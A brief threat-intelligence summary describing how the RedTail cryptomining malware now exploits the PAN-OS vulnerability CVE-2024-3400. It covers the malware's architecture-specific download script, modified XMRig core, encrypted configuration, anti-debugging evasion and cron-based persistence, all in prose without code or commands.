The RedTail cryptomining malware has been updated to exploit CVE-2024-3400, a vulnerability in PAN-OS. The attackers are using private cryptomining pools for greater control, and the malware now includes advanced antiresearch techniques. It spreads through multiple web exploits targeting IoT devices, web applications, SSL-VPNs, and security devices.
Upon disclosure of the vulnerability, there was a notable increase in malicious activity, including attempts to execute commands that download and run a bash script tailored to the victim’s processor architecture. This script downloads the appropriate binary for cryptomining, indicating a sophisticated setup aimed at optimizing mining operations.
The new RedTail variant, packed with the UPX packer, embeds and modifies XMRig’s code. Unlike previous versions, it does not call home for its mining configuration; instead, it uses an encrypted configuration that is decrypted in-memory. The configuration optimizes the mining process using the RandomX algorithm and hugepages settings. The malware employs advanced evasion tactics, such as forking processes and killing debugging instances, and maintains persistence through cron jobs.